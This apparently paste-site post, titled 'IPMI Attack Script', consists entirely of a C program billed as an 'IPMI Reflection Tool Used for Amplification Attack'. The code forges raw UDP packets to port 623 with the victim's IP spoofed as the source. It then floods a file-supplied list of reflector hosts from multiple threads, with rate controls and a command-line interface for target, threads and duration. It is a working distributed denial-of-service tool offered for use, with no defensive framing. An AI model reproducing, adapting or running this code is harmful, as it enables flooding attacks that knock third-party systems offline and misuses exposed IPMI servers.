Dr-L0v3

IPMI Attack Script

Dec 20th, 2017
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  1. /*
  2.    IPMI Reflection Tool
  3.    Used for Amplification Attack
  4.    Greets: BlackHat
  5.    By: Dr.L0v3
  6.  
  7. */
  8.  
  9. #include <time.h>
  10. #include <pthread.h>
  11. #include <unistd.h>
  12. #include <stdio.h>
  13. #include <stdlib.h>
  14. #include <string.h>
  15. #include <sys/socket.h>
  16. #include <netinet/ip.h>
  17. #include <netinet/udp.h>
  18. #include <arpa/inet.h>
  19. #define MAX_PACKET_SIZE 8192
  20. #define PHI 0x9e3779b9
  21. static uint32_t Q[4096], c = 362436;
  22. struct list
  23. {
  24.     struct sockaddr_in data;
  25.     struct list *next;
  26.     struct list *prev;
  27. };
  28. struct list *head;
  29. volatile int tehport;
  30. volatile int limiter;
  31. volatile unsigned int pps;
  32. volatile unsigned int sleeptime = 100;
  33. struct thread_data{ int thread_id; struct list *list_node; struct sockaddr_in sin; };
  34. void init_rand(uint32_t x)
  35. {
  36.     int i;
  37.     Q[0] = x;
  38.     Q[1] = x + PHI;
  39.     Q[2] = x + PHI + PHI;
  40.     for (i = 3; i < 4096; i++)
  41.     {
  42.     Q[i] = Q[i - 3] ^ Q[i - 2] ^ PHI ^ i;
  43.     }
  44. }
  45. uint32_t rand_cmwc(void)
  46. {
  47.     uint64_t t, a = 18782LL;
  48.     static uint32_t i = 4095;
  49.     uint32_t x, r = 0xfffffffe;
  50.     i = (i + 1) & 4095;
  51.     t = a * Q[i] + c;
  52.     c = (t >> 32);
  53.     x = t + c;
  54.     if (x < c) {
  55.     x++;
  56.     c++;
  57.     }
  58.     return (Q[i] = r - x);
  59. }
  60. unsigned short csum (unsigned short *buf, int nwords)
  61. {
  62.     unsigned long sum = 0;
  63.     for (sum = 0; nwords > 0; nwords--)
  64.     sum += *buf++;
  65.     sum = (sum >> 16) + (sum & 0xffff);
  66.     sum += (sum >> 16);
  67.     return (unsigned short)(~sum);
  68. }
  69. void setup_ip_header(struct iphdr *iph)
  70. {
  71.     iph->ihl = 5;
  72.     iph->version = 4;
  73.     iph->tos = 0;
  74.     iph->tot_len = sizeof(struct iphdr) + sizeof(struct udphdr) + 23;
  75.     iph->id = htonl(54321);
  76.     iph->frag_off = 0;
  77.     iph->ttl = MAXTTL;
  78.     iph->protocol = IPPROTO_UDP;
  79.     iph->check = 0;
  80.     iph->saddr = inet_addr("192.168.3.100");
  81. }
  82. void setup_udp_header(struct udphdr *udph)
  83. {
  84.     udph->source = htons(5678);
  85.     udph->dest = htons(623);
  86.     udph->check = 0;
  87.     memcpy((void *)udph + sizeof(struct udphdr), "\x06\x00\xff\x07\x00\x00\x00\x00\x00\x00\x00\x00\x00\x09\x20\x18\xc8\x81\x00\x38\x8e\x04\xb5", 23);
  88.     udph->len=htons(sizeof(struct udphdr) + 23);
  89. }
  90. void *flood(void *par1)
  91. {
  92.     struct thread_data *td = (struct thread_data *)par1;
  93.     char datagram[MAX_PACKET_SIZE];
  94.     struct iphdr *iph = (struct iphdr *)datagram;
  95.     struct udphdr *udph = (/*u_int8_t*/void *)iph + sizeof(struct iphdr);
  96.     struct sockaddr_in sin = td->sin;
  97.     struct  list *list_node = td->list_node;
  98.     int s = socket(PF_INET, SOCK_RAW, IPPROTO_TCP);
  99.     if(s < 0){
  100.     fprintf(stderr, "Could not open raw socket.\n");
  101.     exit(-1);
  102.     }
  103.     init_rand(time(NULL));
  104.     memset(datagram, 0, MAX_PACKET_SIZE);
  105.     setup_ip_header(iph);
  106.     setup_udp_header(udph);
  107.     udph->source = htons(rand() % 65535 - 1026);
  108.     iph->saddr = sin.sin_addr.s_addr;
  109.     iph->daddr = list_node->data.sin_addr.s_addr;
  110.     iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
  111.     int tmp = 1;
  112.     const int *val = &tmp;
  113.     if(setsockopt(s, IPPROTO_IP, IP_HDRINCL, val, sizeof (tmp)) < 0){
  114.     fprintf(stderr, "Error: setsockopt() - Cannot set HDRINCL!\n");
  115.     exit(-1);
  116.     }
  117.     init_rand(time(NULL));
  118.     register unsigned int i;
  119.     i = 0;
  120.     while(1){
  121.         sendto(s, datagram, iph->tot_len, 0, (struct sockaddr *) &list_node->data, sizeof(list_node->data));
  122.         list_node = list_node->next;
  123.         iph->daddr = list_node->data.sin_addr.s_addr;
  124.         iph->id = htonl(rand_cmwc() & 0xFFFFFFFF);
  125.         iph->check = csum ((unsigned short *) datagram, iph->tot_len >> 1);
  126.        
  127.         pps++;
  128.         if(i >= limiter)
  129.         {
  130.             i = 0;
  131.             usleep(sleeptime);
  132.         }
  133.         i++;
  134.     }
  135. }
  136. int main(int argc, char *argv[ ])
  137. {
  138.     if(argc < 6){
  139.     fprintf(stderr, "Invalid parameters !!!\n");
  140.     fprintf(stdout, "Usage: %s <target IP> <port> <reflection file> <threads> <pps limiter, -1 for no limit> <time>\n", argv[0]);
  141.         exit(-1);
  142.     }
  143.     srand(time(NULL));
  144.     int i = 0;
  145.     head = NULL;
  146.     fprintf(stdout, "Setting up sockets...\n");
  147.     int max_len = 128;
  148.     char *buffer = (char *) malloc(max_len);
  149.     buffer = memset(buffer, 0x00, max_len);
  150.     int num_threads = atoi(argv[4]);
  151.     int maxpps = atoi(argv[5]);
  152.     limiter = 0;
  153.     pps = 0;
  154.     int multiplier = 20;
  155.     FILE *list_fd = fopen(argv[3],  "r");
  156.     while (fgets(buffer, max_len, list_fd) != NULL) {
  157.         if ((buffer[strlen(buffer) - 1] == '\n') ||
  158.                 (buffer[strlen(buffer) - 1] == '\r')) {
  159.             buffer[strlen(buffer) - 1] = 0x00;
  160.             if(head == NULL)
  161.             {
  162.                 head = (struct list *)malloc(sizeof(struct list));
  163.                 bzero(&head->data, sizeof(head->data));
  164.                 head->data.sin_addr.s_addr=inet_addr(buffer);
  165.                 head->next = head;
  166.                 head->prev = head;
  167.             } else {
  168.                 struct list *new_node = (struct list *)malloc(sizeof(struct list));
  169.                 memset(new_node, 0x00, sizeof(struct list));
  170.                 new_node->data.sin_addr.s_addr=inet_addr(buffer);
  171.                 new_node->prev = head;
  172.                 new_node->next = head->next;
  173.                 head->next = new_node;
  174.             }
  175.             i++;
  176.         } else {
  177.             continue;
  178.         }
  179.     }
  180.     struct list *current = head->next;
  181.     pthread_t thread[num_threads];
  182.     struct sockaddr_in sin;
  183.     sin.sin_family = AF_INET;
  184.     sin.sin_addr.s_addr = inet_addr(argv[1]);
  185.     struct thread_data td[num_threads];
  186.     for(i = 0;i<num_threads;i++){
  187.         td[i].thread_id = i;
  188.         td[i].sin= sin;
  189.         td[i].list_node = current;
  190.         pthread_create( &thread[i], NULL, &flood, (void *) &td[i]);
  191.     }
  192.     fprintf(stdout, "Starting flood...\n");
  193.     for(i = 0;i<(atoi(argv[6])*multiplier);i++)
  194.     {
  195.         usleep((1000/multiplier)*1000);
  196.         if((pps*multiplier) > maxpps)
  197.         {
  198.             if(1 > limiter)
  199.             {
  200.                 sleeptime+=100;
  201.             } else {
  202.                 limiter--;
  203.             }
  204.         } else {
  205.             limiter++;
  206.             if(sleeptime > 25)
  207.             {
  208.                 sleeptime-=25;
  209.             } else {
  210.                 sleeptime = 0;
  211.             }
  212.         }
  213.         pps = 0;
  214.     }
  215.     return 0;
  216. }
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